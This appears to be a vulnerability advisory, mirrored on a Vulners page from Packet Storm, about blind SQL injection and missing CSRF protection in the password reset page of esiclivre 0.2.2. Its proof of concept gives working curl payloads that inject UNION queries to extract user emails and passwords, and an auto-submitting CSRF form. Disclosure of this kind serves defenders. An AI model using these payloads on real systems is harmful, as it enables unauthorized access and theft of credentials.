Lucene search
K

📄 esiclivre 0.2.2 SQL Injection

🗓️ 22 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 60 Views

esiclivre 0.2.2 password reset has blind SQL injection and missing CSRF protection.

Code
==================================================================================================================================
    | # Title     : esiclivre <= 0.2.2 - Multiple Vulnerabilities                                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/esiclivre/esiclivre/blob/master/reset/index.php                                               |
    ==================================================================================================================================
    
    [+] Summary    : The password reset functionality in esiclivre is affected by multiple vulnerabilities. 
                     The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling. 
    				 Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting, 
    				 enabling attackers to perform user enumeration, injection attacks, and abuse the password reset mechanism.
    
    
    [+] POC   :  
    
    Blind SQL Injection (UNION-based and Blind techniques) :
    
    curl -X POST http://target/reset/index.php -d "cpfcnpj=0' UNION SELECT email,senha,3,4,5 FROM usuarios-- -"
    
    curl -X POST http://target/reset/index.php -d "cpfcnpj=123' AND (SELECT SUBSTRING(@@version,1,1))='5"
    
    CSRF Attack : 
    
    <form action="https://target/reset/index.php" method="POST">
      <input type="hidden" name="cpfcnpj" value="' OR 1=1-- ">
      <input type="submit">
    </form>
    <script>
    document.forms[0].submit();
    </script>
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation